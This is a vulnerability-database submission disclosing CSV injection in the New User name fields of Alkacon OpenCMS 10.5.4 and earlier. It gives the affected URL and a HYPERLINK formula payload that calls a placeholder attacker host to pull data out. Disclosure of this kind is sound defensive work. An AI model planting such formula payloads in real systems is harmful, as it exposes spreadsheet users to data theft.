| Title | Alkacon OpenCMS | CSV Injection | v10.5.4 and before |
|---|
| Description | Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name
Impacted URL is http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
Payload used is '=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'
Further details - https://github.com/alkacon/opencms-core/issues/636
Already requested for CVE, yet to receive it. |
|---|
| Source | ⚠️ https://github.com/alkacon/opencms-core/issues/636 |
|---|
| User | pramodrana (UID 2935) |
|---|
| Submission | 05/06/2019 08:44 (7 years ago) |
|---|
| Moderation | 05/07/2019 07:24 (23 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 134439 [Alkacon OpenCms 10.5.4 New User injection] |
|---|
| Points | 20 |
|---|